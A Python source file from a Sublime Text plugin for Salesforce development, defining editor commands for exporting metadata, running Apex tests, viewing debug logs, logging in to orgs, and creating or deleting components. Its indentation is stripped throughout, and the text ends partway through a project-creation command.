class CopyFilesToProject(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(CopyFilesToProject, self).__init__(*args, **kwargs)
def run(self, files, switch=True, source_org=None):
settings = context.get_settings()
if not source_org:
source_org = settings["default_project_name"]
if switch:
return self.window.run_command("switch_project", {
"callback_options": {
"callback_command": "copy_files_to_project",
"args": {
"files": files,
"switch": False,
"source_org": source_org
}
}
})
target_dir = settings["workspace"]
util.copy_files(self.attributes, target_dir)
# If succeed, just show the succeed message
Printer.get("log").write("Files are copied to " + source_org)
# we need to switch project back to original
if settings["switch_back_after_migration"]:
util.switch_project(source_org)
def is_enabled(self, files, **kwargs):
if not files: return False
self.settings = context.get_settings()
self.attributes = []
for _file in files:
if not os.path.isfile(_file): continue # Ignore folder
if _file.endswith("-meta.xml"): continue # Ignore meta file
attribute = util.get_file_attributes(_file)
if attribute["metadata_folder"] not in self.settings["all_metadata_folders"]:
continue
attribute["fileDir"] = _file
self.attributes.append(attribute)
if not self.attributes:
return False
return True
def is_visible(self, files, **kwargs):
return self.is_enabled(files)
class ExportProfile(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(ExportProfile, self).__init__(*args, **kwargs)
def run(self):
import threading
thread = threading.Thread(target=util.export_profile_settings)
thread.start()
def is_enabled(self):
return util.check_action_enabled()
class ExportValidationRulesCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(ExportValidationRulesCommand, self).__init__(*args, **kwargs)
def run(self):
settings = context.get_settings()
workflow_path = settings["workspace"] + "/src/objects"
if not os.path.exists(workflow_path):
Printer.get('error').write(message.METADATA_CHECK)
return
processor.handle_export_validation_rules(settings)
def is_enabled(self):
return util.check_action_enabled()
class ExportCustomLablesCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(ExportCustomLablesCommand, self).__init__(*args, **kwargs)
def run(self):
settings = context.get_settings()
workspace = settings["workspace"]
lable_path = workspace + "/src/labels/CustomLabels.labels"
if not os.path.isfile(lable_path):
Printer.get('error').write(message.METADATA_CHECK)
return
outputdir = settings["workspace"] + "/.export/labels"
if not os.path.exists(outputdir): os.makedirs(outputdir)
lables = xmltodict.parse(open(lable_path, "rb").read())
util.list2csv(outputdir + "/Labels.csv", lables["CustomLabels"]["labels"])
def is_enabled(self):
return util.check_action_enabled()
class ExportWorkflowsCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(ExportWorkflowsCommand, self).__init__(*args, **kwargs)
def run(self):
settings = context.get_settings()
workspace = settings["workspace"]
workflow_path = workspace + "/src/workflows"
if not os.path.exists(workflow_path):
Printer.get('error').write(message.METADATA_CHECK)
return
processor.handle_export_workflows(settings)
def is_enabled(self):
return util.check_action_enabled()
class ExportCustomFieldCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(ExportCustomFieldCommand, self).__init__(*args, **kwargs)
def run(self):
processor.handle_export_customfield()
def is_enabled(self):
return util.check_action_enabled()
class ExportRoleHierarchyCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(ExportRoleHierarchyCommand, self).__init__(*args, **kwargs)
def run(self):
processor.handle_export_role_hierarchy()
def is_enabled(self):
return util.check_action_enabled()
class DescribeSobjectCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(DescribeSobjectCommand, self).__init__(*args, **kwargs)
def run(self):
sobjects_describe = util.populate_sobjects_describe()
self.sobjects = sorted(sobjects_describe.keys())
self.window.show_quick_panel(self.sobjects, self.on_done)
def on_done(self, index):
if index == -1: return
processor.handle_describe_sobject(self.sobjects[index])
class ExportWorkbookCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(ExportWorkbookCommand, self).__init__(*args, **kwargs)
def run(self):
self.window.show_input_panel("Input Sobjects(* or sobjects separated with semi-colon), Case is Sensitive",
"*", self.on_input, None, None)
def on_input(self, input):
# Display the fields in a new view
input = input.replace(" ", "")
if input == "*":
processor.handle_export_all_workbooks(5)
else:
# Collect the sobjects
sobjects = input.split(";")
# Check whether the input sobjects are valid
# If any one is not valid, allow user to input again
sobjects_describe = util.populate_sobjects_describe()
if not sobjects_describe: return
for sobject in sobjects:
if sobject not in sobjects_describe:
message = '"%s" is not valid sobject, do you want to try again?' % sobject
if not sublime.ok_cancel_dialog(message, "Continue?"): return
self.window.show_input_panel("Sobjects(* means all, or sobjects seprated with semi-colon)",
input, self.on_input, None, None)
return
# After ensured input is valid, just start to generate workbooks
processor.handle_export_specified_workbooks(sobjects)
def is_enabled(self):
return util.check_action_enabled()
class ViewComponentInSfdcCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(ViewComponentInSfdcCommand, self).__init__(*args, **kwargs)
def run(self):
self.all_components = util.populate_all_components()
if not self.all_components:
Printer.get("error").write("No components cache")
return
self.all_components_name = sorted(list(self.all_components.keys()))
self.window.show_quick_panel(self.all_components_name, self.on_done)
def on_done(self, index):
if index == -1: return
class_id = self.all_components[self.all_components_name[index]]
startURL = "/" + class_id
self.window.run_command("login_to_sfdc", {"startURL": startURL})
class PreviewPageCommand(sublime_plugin.TextCommand):
def run(self, view):
startURL = "/apex/" + self.attributes["name"]
self.view.window().run_command("login_to_sfdc", {"startURL": startURL})
def is_visible(self):
if not self.view.file_name(): return False
self.attributes = util.get_file_attributes(self.view.file_name())
if not self.attributes["extension"]: return False
if self.attributes["extension"] != "page": return False
return util.check_enabled(self.view.file_name())
class RunOneTestCommand(sublime_plugin.WindowCommand):
""" List the test classes from local cache, after any one is chosen,
get the attribute of the chosen class and run test,
Cache structure is shown as below:
{
"ApexClass":
{
"accountcontroller":
{
"body": "Body",
"extension": ".cls",
"id": "01p90000003hdEGAAY",
"is_test": false,
"name": "AccountController",
"type": "ApexClass",
"url": "/services/data/v30.0/sobjects/ApexClass/01p90000003hdEGAAY"
},
...
},
...
}
"""
def __init__(self, *args, **kwargs):
super(RunOneTestCommand, self).__init__(*args, **kwargs)
def run(self):
self.classes_attr = util.populate_components("ApexClass")
self.classmap = {}
for key in self.classes_attr:
if not self.classes_attr[key]["is_test"]: continue
self.classmap[self.classes_attr[key]["name"]] = key
if not self.classmap:
Printer.get('error').write("No Test Class");
return
self.class_names = sorted(list(self.classmap.keys()))
self.window.show_quick_panel(self.class_names, self.on_done)
def on_done(self, index):
if index == -1: return
class_name = self.class_names[index]
key = self.classmap[class_name]
class_id = self.classes_attr[key]["id"]
processor.handle_run_test(class_name, class_id)
class FetchOrgWideCoverageCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(FetchOrgWideCoverageCommand, self).__init__(*args, **kwargs)
def run(self):
pass
class ChooseTestClasses(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(ChooseTestClasses, self).__init__(*args, **kwargs)
def run(self, callback_options={}):
self.callback_options = callback_options
if not hasattr(self, "chosen_classes"):
self.chosen_classes = []
# Get all classes
self.classes_attr = util.populate_components("ApexClass")
self.classmap = {}
selected_items = [];
unselected_items = []
for key, item in self.classes_attr.items():
if not item["is_test"]:
continue
if "namespacePrefix" in item and item["namespacePrefix"]:
cname = "%s.%s" % (
item["namespacePrefix"], item["name"]
)
else:
cname = item["name"]
classItem = "%s[%s] %s" % (
" " * 4,
"√" if cname in self.chosen_classes else "x",
cname
)
if cname in self.chosen_classes:
selected_items.append(classItem)
else:
unselected_items.append(classItem)
self.classmap[classItem] = cname
if not self.classmap:
settings = context.get_settings()
return Printer.get('error').write(
"No available test class in {org_name} org".format(
org_name=settings["default_project_name"]
)
);
# Add `All` Item
allItem = "[%s] All" % (
"√" if self.chosen_classes else "x"
)
self.items = [allItem]
# Add class items
selected_items = sorted(selected_items)
unselected_items = sorted(unselected_items)
self.items.extend(selected_items)
self.items.extend(unselected_items)
selected_index = 0
if hasattr(self, "index"):
selected_index = self.index
self.window.show_quick_panel(self.items, self.on_done,
sublime.MONOSPACE_FONT, selected_index)
def on_done(self, index):
if index == -1:
callback_command = self.callback_options["callback_command"]
if self.chosen_classes:
args = self.callback_options.get("args", {})
args["chosen_classes"] = self.chosen_classes
return sublime.active_window().run_command(
callback_command, args
)
if callback_command == "deploy_package":
Printer.get("error").write(
"You should choose at least one test class"
)
return
self.index = index
chosen_item = self.items[index]
if chosen_item.endswith(" All"):
if len(self.chosen_classes) == len(self.items) - 1:
self.chosen_classes = []
else:
self.chosen_classes = []
for k, v in self.classmap.items():
if v == "*": continue
self.chosen_classes.append(v)
else:
class_attr = self.classmap[chosen_item]
class_name = class_attr
if class_name in self.chosen_classes:
self.chosen_classes.remove(class_name)
else:
self.chosen_classes.append(class_name)
sublime.set_timeout_async(self.run(
callback_options=self.callback_options
), 10)
class RunSyncTests(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(RunSyncTests, self).__init__(*args, **kwargs)
def run(self, chosen_classes=[]):
if not chosen_classes:
return self.window.run_command('choose_test_classes', {
"callback_options": {
"callback_command": "run_sync_tests"
}
})
processor.handle_run_sync_test(chosen_classes)
class RunSyncTest(sublime_plugin.TextCommand):
def run(self, edit):
tests = [];
for region in self.view.sel():
sel = self.view.substr(self.view.word(region.begin()))
if sel and not sel.isspace():
tests.append(sel.strip())
processor.handle_run_sync_test([self.cname], tests)
def is_enabled(self):
# Get current file name and Read file content
file_name = self.view.file_name()
if not file_name or not file_name.endswith(".cls"):
return False
if not util.check_enabled(file_name):
return False
# Test class must be class firstly
body = open(file_name, "rb").read()
# Test class must contains "testMethod" or @isTest notation
lower_body = body.lower()
if b"testmethod" not in lower_body and b"@istest" not in lower_body:
return False
component_attribute, self.cname = util.get_component_attribute(file_name)
if "namespacePrefix" in component_attribute and \
component_attribute["namespacePrefix"]:
self.cname = "%s.%s" % (
component_attribute["namespacePrefix"],
self.cname
)
for region in self.view.sel():
sel = self.view.substr(self.view.word(region.begin()))
if sel and not sel.isspace() and not re.compile(r'^[a-zA-Z0-9_]*$').match(sel.strip()):
return False
return True
def is_visible(self):
return self.is_enabled()
class RunAsyncTest(sublime_plugin.WindowCommand):
"""
@deprecated
"""
def __init__(self, *args, **kwargs):
super(RunAsyncTest, self).__init__(*args, **kwargs)
def run(self, files):
processor.handle_run_async_test_classes(self.class_ids)
def is_enabled(self, files):
# Check whether any classes are chosen
if len(files) == 0: return False
# Check whether there are test class in chosen classes
self.class_ids = []
for f in files:
component_attribute, name = util.get_component_attribute(f)
if not component_attribute or not component_attribute["is_test"]:
continue
self.class_ids.append(component_attribute["id"])
return len(self.class_ids) > 0
def is_visible(self):
return self.is_enabled()
class RunTestCommand(sublime_plugin.TextCommand):
"""
Run Async Test
"""
def run(self, view):
# Get component_attribute by file_name
attributes = util.get_file_attributes(self.view.file_name())
component_attribute = util.get_component_attribute(self.view.file_name())[0]
# Process run test
processor.handle_run_test(attributes["name"], component_attribute["id"])
def is_enabled(self):
# Get current file name and Read file content
file_name = self.view.file_name()
if not file_name or not file_name.endswith(".cls"):
return False
if not util.check_enabled(file_name):
return False
# Test class must be class firstly
body = open(file_name, "rb").read()
# Test class must contains "testMethod" or @isTest notation
lower_body = body.lower()
if b"testmethod" not in lower_body and b"@istest" not in lower_body:
return False
return True
def is_visible(self):
return self.is_enabled()
class TrackAllDebugLogs(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(TrackAllDebugLogs, self).__init__(*args, **kwargs)
def run(self):
users = processor.handle_populate_users("track_all_debug_logs")
if not users: return
if sublime.ok_cancel_dialog("Confirm to track logs for all users?", "Continue"):
processor.handle_track_all_debug_logs_thread(users)
class TrackDebugLog(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(TrackDebugLog, self).__init__(*args, **kwargs)
def run(self, track_self=False):
if track_self:
processor.handle_create_debug_log('Me', None)
return
self.users = processor.handle_populate_users("track_debug_log")
if not self.users: return
self.users_name = sorted(self.users.keys(), reverse=False)
self.window.show_quick_panel(self.users_name, self.on_done)
def on_done(self, index):
if index == -1: return
user_name = self.users_name[index]
user_id = self.users[user_name]
processor.handle_create_debug_log(user_name, user_id)
class FetchDebugLogCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(FetchDebugLogCommand, self).__init__(*args, **kwargs)
def run(self, fetch_self=False):
if fetch_self:
processor.handle_fetch_debug_logs('Me', None)
return
self.users = processor.handle_populate_users("fetch_debug_log")
if not self.users: return # Network Issue Cause
self.users_name = sorted(self.users.keys(), reverse=False)
self.window.show_quick_panel(self.users_name, self.on_done)
def on_done(self, index):
if index == -1: return
user_name = self.users_name[index]
user_id = self.users[user_name]
processor.handle_fetch_debug_logs(user_name, user_id)
class ViewDebugLogDetail(sublime_plugin.TextCommand):
def run(self, view):
processor.handle_view_debug_log_detail(self.log_id)
def is_enabled(self):
# Choose the valid Id, you will see this command
# make sure selection has region in it
if len(self.view.sel()) == 0:
return False
region = self.view.sel()[0]
self.log_id = self.view.substr(self.view.word(region.begin()))
if len(self.log_id) != 15 and len(self.log_id) != 18: return False
if not re.compile(r'^[a-zA-Z0-9]*$').match(self.log_id): return False
if not self.log_id.startswith("07L"): return False
return True
class ViewCodeCoverageAfterSyncTest(sublime_plugin.TextCommand):
def run(self, edit):
# get code coverage cache
settings = context.get_settings()
work_dir = os.path.join(settings["workspace"])
cache_file = os.path.join(work_dir, ".config", "coverage.json")
if not os.path.isfile(cache_file):
return
coverages = json.loads(open(cache_file).read())
record = coverages.get(self.file_name)
# get file content, may be apex class or trigger
class_path = os.path.join(work_dir, 'src',
'classes', self.file_name + '.cls')
trigger_path = os.path.join(work_dir, 'src',
'triggers', self.file_name + '.trigger')
_path = class_path if os.path.isfile(class_path) else trigger_path
if not os.path.isfile(_path):
return
with open(_path, encoding="utf-8") as fp:
file_content = fp.read()
if record and record.get("Coverage"):
util.view_coverage(self.file_name, record, file_content)
def is_enabled(self):
if len(self.view.sel()) == 0 or self.view.name() != 'Test Result':
return False
region = self.view.sel()[0]
# Make sure only enable for classes or triggers
start_reg = self.view.find('Trigger Or Class Code Coverage:', 0)
start_r, _ = self.view.rowcol(start_reg.begin())
r, _ = self.view.rowcol(region.begin())
if r - start_r < 4:
return False
self.file_name = self.view.substr(self.view.word(region.begin()))
if not re.compile(r'^[\w]+$').match(self.file_name):
return False
return self.file_name and self.file_name[0].isalpha()
def is_visible(self):
return self.view.name() == 'Test Result'
class ViewDebugOnly(sublime_plugin.TextCommand):
def run(self, view):
whole_region = sublime.Region(0, self.view.size())
debug_content = []
for line in self.view.lines(whole_region):
line_content = self.view.substr(line)
if "|USER_DEBUG|" in line_content:
debug_content.append(line_content)
self.view.window().run_command("new_dynamic_view", {
"view_id": self.view.id(),
"view_name": self.view.name(),
"point": 0,
"erase_all": True,
"input": "\n".join(debug_content)
})
def is_enabled(self):
return self.view.settings().get("is_debug_log") is True
class ExecuteQuery(sublime_plugin.TextCommand):
def run(self, view):
sublime.active_window().run_command("haoku", {
"router": "query?param=" + self.selection
})
def is_enabled(self):
# Selection must start SELECT,
# otherwise you can't see this command
self.selection = self.view.substr(self.view.sel()[0])
if not self.selection or not self.selection.upper().startswith("SELECT"):
return False
return True
class ExecuteAnonymousCommand(sublime_plugin.TextCommand):
def run(self, view):
processor.handle_execute_anonymous(self.selection)
def is_enabled(self):
# Enabled if has selection
self.selection = self.view.substr(self.view.sel()[0])
if not self.selection: return False
return True
class ViewIdInSfdcWebCommand(sublime_plugin.TextCommand):
def run(self, view):
startURL = "/" + self.record_id
if self.record_id.startswith("012"):
startURL = "/setup/ui/recordtypefields.jsp?id=" + self.record_id
if self.record_id.startswith("07L"):
startURL = "/p/setup/layout/ApexDebugLogDetailEdit/d?apex_log_id=" + self.record_id
self.view.window().run_command("login_to_sfdc", {"startURL": startURL})
def is_enabled(self):
# Choose the valid Id, you will see this command
if util.is_python3x():
self.record_id = self.view.substr(self.view.sel()[0])
else:
self.record_id = self.view.substr(self.view.sel()[0]).encode("utf-8")
if len(self.record_id) != 15 and len(self.record_id) != 18:
return False
if not re.compile(r'^[a-zA-Z0-9]*$').match(self.record_id):
return False
return True
class ShowInSfdcWebCommand(sublime_plugin.TextCommand):
def run(self, view):
# Get file_name and component_attribute
component_attribute = util.get_component_attribute(self.view.file_name())[0]
# Open this component in salesforce web
startURL = "/" + component_attribute["id"]
self.view.window().run_command("login_to_sfdc", {"startURL": startURL})
def is_enabled(self):
return util.check_enabled(self.view.file_name())
class LoginToSfdcCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(LoginToSfdcCommand, self).__init__(*args, **kwargs)
def run(self, startURL="", copy_url=False):
# Get toolingapi settings
settings = context.get_settings()
session = util.get_session_info(settings)
# If .config/session.json is not exist, login firstly
if not session:
return self.window.run_command('login',
{
"callback_options": {
"callback_command": "login_to_sfdc",
"args": {
"startURL": startURL
}
}
}
)
# If .config/session.json is exist, use frontdoor method
show_url = "%s/secur/frontdoor.jsp?sid=%s&retURL=%s" % (
session["instance_url"], session["session_id"], startURL
)
if not copy_url:
return util.open_with_browser(show_url)
sublime.set_clipboard(show_url)
class AboutCommand(sublime_plugin.ApplicationCommand):
def run(command):
package_info = sublime.load_settings("package.sublime-settings")
version_info = "\n%s\n\n%s\n\nCopyright © 2013-2019 By %s\n\tDev Channel, Build v%s" % (
package_info.get("description"),
package_info.get("homepage"),
package_info.get("author"),
package_info.get("version")
)
sublime.message_dialog(version_info)
class ReportIssueCommand(sublime_plugin.ApplicationCommand):
def run(command):
package_info = sublime.load_settings("package.sublime-settings")
util.open_with_browser(package_info.get("issue_url"))
class HaoideHelp(sublime_plugin.ApplicationCommand):
def run(command, url=""):
package_info = sublime.load_settings("package.sublime-settings")
util.open_with_browser(package_info.get("homepage") + url)
class ReleaseNotesCommand(sublime_plugin.ApplicationCommand):
def run(command):
package_info = sublime.load_settings("package.sublime-settings")
util.open_with_browser(package_info.get("history_url"))
class DeleteFilesFromServer(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(DeleteFilesFromServer, self).__init__(*args, **kwargs)
def run(self, files):
# Confirm Delete Action
if sublime.ok_cancel_dialog("Confirm to delete?"):
for f in files:
component_attribute = util.get_component_attribute(f)[0]
processor.handle_delete_component(component_attribute["url"], f)
def is_visible(self, files):
"""
1. You must have selected one file or more
2. All selected file should be visible
"""
if len(files) == 0: return False
self._files = [f for f in files if not f.endswith("-meta.xml")]
if len(self._files) == 0: return False
for _file in self._files:
attr = util.get_component_attribute(_file)[0]
if not attr or "url" not in attr:
return False
return True
class DeleteFileFromServer(sublime_plugin.TextCommand):
def run(self, view):
files = [self.view.file_name()]
self.view.window().run_command("delete_files_from_server", {
"files": [self.view.file_name()]
})
def is_enabled(self):
self.file_name = self.view.file_name()
if not self.file_name: return False
if self.file_name.endswith("-meta.xml"): return False
attr = util.get_component_attribute(self.file_name)[0]
if not attr or "url" not in attr:
return False
return True
def is_visible(self):
return self.is_enabled()
class CreateApexTriggerCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(CreateApexTriggerCommand, self).__init__(*args, **kwargs)
def run(self):
sobjects_describe = util.populate_sobjects_describe()
self.sobjects = sorted([name for name in sobjects_describe \
if "triggerable" in sobjects_describe[name] and sobjects_describe[name]["triggerable"]])
self.window.show_quick_panel(self.sobjects, self.on_done)
def on_done(self, index):
if index == -1: return
self.window.run_command("create_component", {
"component_type": "ApexTrigger",
"markup_or_body": "Body",
"sobject_name": self.sobjects[index]
})
def is_enabled(self):
return util.check_action_enabled()
class CreateApexPageCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(CreateApexPageCommand, self).__init__(*args, **kwargs)
def run(self):
self.window.run_command("create_component", {
"component_type": "ApexPage",
"markup_or_body": "Markup"
})
def is_enabled(self):
return util.check_action_enabled()
class CreateApexComponentCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(CreateApexComponentCommand, self).__init__(*args, **kwargs)
def run(self):
self.window.run_command("create_component", {
"component_type": "ApexComponent",
"markup_or_body": "Markup"
})
def is_enabled(self):
return util.check_action_enabled()
class CreateApexClassCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(CreateApexClassCommand, self).__init__(*args, **kwargs)
def run(self):
self.window.run_command("create_component", {
"component_type": "ApexClass",
"markup_or_body": "Body"
})
def is_enabled(self):
return util.check_action_enabled()
class CreateStaticResource(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(CreateStaticResource, self).__init__(*args, **kwargs)
def run(self):
settings = context.get_settings()
self.content_types = settings["content_types"]
self.window.show_quick_panel(self.content_types, self.on_choose)
def on_choose(self, index):
if index == -1: return
self.content_type = self.content_types[index]
self.input_name_message = "Please Input StaticResource Name: "
self.window.show_input_panel(self.input_name_message,
"", self.on_input_name, None, None)
def on_input_name(self, input):
# Create component to local according to user input
if not re.match('^[a-zA-Z]+\\w+$', input):
message = 'Invalid name, do you want to try again?'
if not sublime.ok_cancel_dialog(message, "Try Again?"): return
self.window.show_input_panel(self.input_name_message,
"", self.on_input_name, None, None)
return
self.resource_name = input
# Input file location
self.input_location_message = "Please Input File or Path for StaticResource: "
self.window.show_input_panel(self.input_location_message,
"", self.on_input_location, None, None)
def on_input_location(self, location):
# Get file or path from user input, allow trying agin
if not os.path.exists(location) and not os.path.isfile(location):
if not sublime.ok_cancel_dialog("Invalid file or path", "Try Again?"):
return
self.window.show_input_panel(self.input_location_message,
"", self.on_input_location, None, None)
return
if os.path.isfile(location):
body = open(location, "r").read()
data = {
"Name": self.resource_name,
"ContentType": self.content_type,
"CacheControl": "Private",
"Body": body
}
processor.handle_create_static_resource(data)
def is_enabled(self):
return util.check_action_enabled()
class CreateComponentCommand(sublime_plugin.WindowCommand):
"""
Create Apex Class/Trigger/Page/Component via Tooling API
"""
def __init__(self, *args, **kwargs):
super(CreateComponentCommand, self).__init__(*args, **kwargs)
def run(self, template_name=None,
component_name=None,
component_type=None,
markup_or_body=None,
sobject_name=None):
self.template_name = template_name
self.component_name = component_name
self.component_type = component_type
self.markup_or_body = markup_or_body
self.sobject_name = sobject_name
self.templates = util.load_templates()
templates = self.templates[self.component_type]
self.template_names = [[n, templates[n]["description"]] for n in templates]
self.template_names = sorted(self.template_names)
# After input # in visualforce page, we can get
# the component name and template name, no need to choose again
if self.component_name and self.template_name:
self.template_attr = templates[self.template_name]
self.create_component()
else:
# If component type is ApexTrigger, we need to choose sobject and template,
# however, sublime Quick panel will be unavailable for the second choose panel,
if self.component_type == "ApexTrigger" or len(self.template_names) == 1:
self.on_choose_template(0)
else:
self.window.show_quick_panel(self.template_names, self.on_choose_template)
def on_choose_template(self, index):
if index == -1: return
self.template_name = self.template_names[index][0]
self.template_attr = self.templates[self.component_type][self.template_name]
if self.component_name:
self.create_component()
else:
message = "Please Input %s Name %s: " % (
self.component_type,
"for %s" % self.sobject_name if self.component_type == "ApexTrigger" else ""
)
self.window.show_input_panel(message, "", self.on_input, None, None)
def on_input(self, input):
# Create component to local according to user input
if not re.match('^[a-zA-Z]+\\w+$', input):
message = 'Invalid format, do you want to try again?'
if not sublime.ok_cancel_dialog(message, "Try Again?"): return
self.window.show_input_panel("Please Input Name: ", "", self.on_input, None, None)
return
self.component_name = input
self.create_component()
def create_component(self):
self.settings = context.get_settings()
workspace = self.settings["workspace"]
extension = self.template_attr["extension"]
directory = self.template_attr["directory"]
with open(os.path.join(workspace, ".templates", directory)) as fp:
body = fp.read()
if extension == ".trigger":
body = body.replace("Trigger_Name__c", self.component_name).replace("Sobject_Name__c", self.sobject_name)
elif extension == ".cls":
body = body.replace("Class_Name__c", self.component_name)
component_outputdir = os.path.join(workspace, "src", self.settings[self.component_type]["directoryName"])
if not os.path.exists(component_outputdir):
os.makedirs(component_outputdir)
self.settings = context.get_settings()
util.add_project_to_workspace(self.settings)
file_name = "%s/%s" % (component_outputdir, self.component_name + extension)
if os.path.isfile(file_name):
_message = '"%s" is already exist, do you want to try again?' % self.component_name
if not sublime.ok_cancel_dialog(_message, "Continue?"):
self.window.open_file(file_name)
return
self.window.show_input_panel("Please Input Name: ", "", self.on_input, None, None)
return
with open(file_name, "w") as fp:
fp.write(body)
# In windows, new file is not shown in the sidebar,
# we need to refresh the sublime workspace to show it
sublime.active_window().run_command("refresh_folder_list")
# Build Post body
data = {
"name": self.component_name,
self.markup_or_body: body
}
if self.component_type == "ApexClass":
data["IsValid"] = True
elif self.component_type == "ApexTrigger":
data["TableEnumOrId"] = self.sobject_name
elif self.component_type in ["ApexPage", "ApexComponent"]:
data["MasterLabel"] = self.component_name
processor.handle_create_component(data, self.component_name,
self.component_type,
self.markup_or_body,
file_name)
class SaveToServer(sublime_plugin.TextCommand):
"""
Save Metadata to Server using Tooling API
"""
def run(self, edit, is_check_only=False):
# Check whether need confirm
settings = context.get_settings()
if settings["confirm_on_save"]:
message = "Confirm to continue save operation?"
if not sublime.ok_cancel_dialog(message, "Save to Server?"):
return
# Automatically save current file if dirty
if self.view.is_dirty():
self.view.run_command("save")
# Handle Save Current Component
processor.handle_save_to_server(self.view.file_name(), is_check_only)
def is_enabled(self):
if not self.view or not self.view.file_name():
return False
attributes = util.get_file_attributes(self.view.file_name())
if attributes["metadata_folder"] not in ["classes", "components", "pages", "triggers", "aura", "lwc"]:
return False
return util.check_enabled(self.view.file_name())
def is_visible(self):
return self.is_enabled()
class ViewFileAttributes(sublime_plugin.TextCommand):
def run(self, edit):
view = sublime.active_window().new_file()
view.run_command("new_view", {
"name": self.cname + " Attributes",
"input": json.dumps(self.component_attribute, indent=4)
})
def is_enabled(self):
if not self.view or not self.view.file_name(): return False
self.file_name = self.view.file_name()
self.settings = context.get_settings()
self.component_attribute, self.cname = util.get_component_attribute(self.file_name)
if not self.component_attribute:
return False
return True
class SwitchProjectCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(SwitchProjectCommand, self).__init__(*args, **kwargs)
def run(self, callback_options={}):
self.callback_options = callback_options
settings = context.get_settings()
projects = {}
for k, v in settings["projects"].items():
if not v.get("hidden_in_project_list", False):
projects[k] = v
self.projects = ["(" + ('Active' if projects[p]["default"] else
'Inactive') + ") " + p for p in projects]
self.projects = sorted(self.projects, reverse=False)
self.window.show_quick_panel(self.projects, self.on_done)
def on_done(self, index):
if index == -1: return
# Switch to chosen project
default_project = self.projects[index].split(") ")[1]
util.switch_project(default_project)
settings = context.get_settings()
described_metadata = util.get_described_metadata(settings)
if not described_metadata:
session = util.get_session_info(settings)
if not session:
return processor.handle_login_thread()
return self.window.run_command("describe_metadata", {
"callback_options": self.callback_options
})
# Execute callback command
if "callback_command" in self.callback_options:
callback_command = self.callback_options["callback_command"]
args = self.callback_options["args"] if "args" in self.callback_options else {}
self.window.run_command(callback_command, args)
class Login(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(Login, self).__init__(*args, **kwargs)
def run(self, callback_options={}, force=False):
processor.handle_login_thread(callback_options, force=force)
class UpdateUserLanguage(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(UpdateUserLanguage, self).__init__(*args, **kwargs)
def run(self):
settings = context.get_settings()
self.languages_settings = settings["user_language"]
self.languages = sorted(self.languages_settings.keys())
self.window.show_quick_panel(self.languages, self.on_choose)
def on_choose(self, index):
if index == -1: return
chosen_language = self.languages[index]
processor.handle_update_user_language(self.languages_settings[chosen_language])
def is_enabled(self):
return util.check_action_enabled()
class EnableDevelopmentMode(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(EnableDevelopmentMode, self).__init__(*args, **kwargs)
def run(self):
self.users = processor.handle_populate_users("enable_development_mode")
if not self.users: return # Network Issue Cause
self.users_name = sorted(self.users.keys(), reverse=False)
self.window.show_quick_panel(self.users_name, self.on_done)
def on_done(self, index):
if index == -1: return
user_name = self.users_name[index]
user_id = self.users[user_name]
processor.handle_enable_development_mode(user_id)
def is_enabled(self):
return util.check_action_enabled()
class UpdateUserPassword(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(UpdateUserPassword, self).__init__(*args, **kwargs)
def run(self):
self.users = processor.handle_populate_users("update_user_password")
if not self.users: return # Network Issue Cause
self.users_name = sorted(self.users.keys(), reverse=False)
self.window.show_quick_panel(self.users_name, self.on_done)
def on_done(self, index):
if index == -1: return
user_name = self.users_name[index]
self.user_id = self.users[user_name]
sublime.active_window().show_input_panel("Input New Password: ",
"", self.on_input, None, None)
def on_input(self, password):
if not re.match('[\s\S]{5,22}', password):
message = 'Invalid password, do you want to try again?'
if not sublime.ok_cancel_dialog(message, "Try Again?"): return
return sublime.active_window().show_input_panel("Input New Password: ",
"", self.on_input, None, None)
processor.handle_update_user_password(self.user_id, password)
def is_enabled(self):
return util.check_action_enabled()
class UpdateProjectPatternsCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(UpdateProjectPatternsCommand, self).__init__(*args, **kwargs)
def run(self):
settings = context.get_settings()
util.add_project_to_workspace(settings)
def is_enabled(self):
return util.check_action_enabled()
class UpdateProjectCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(UpdateProjectCommand, self).__init__(*args, **kwargs)
def run(self):
message = "Are you sure you really want to update this project?"
if not sublime.ok_cancel_dialog(message, "Update Project?"): return
processor.handle_new_project(is_update=True)
def is_enabled(self):
return util.check_action_enabled()
class CreateNewProject(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(CreateNewProject, self).__init__(*args, **kwargs)
def run(self):
settings = context.get_settings()
described_metadata = util.get_described_metadata(settings)
if not described_metadata:
return self.window.run_command("describe_metadata", {
"callback_options": {
"callback_command": "create_new_project"
}
})
# Check whether default project has subscribed_metadata_objects attribute
# Check whether default project has one subscribed_metadata_objects at least
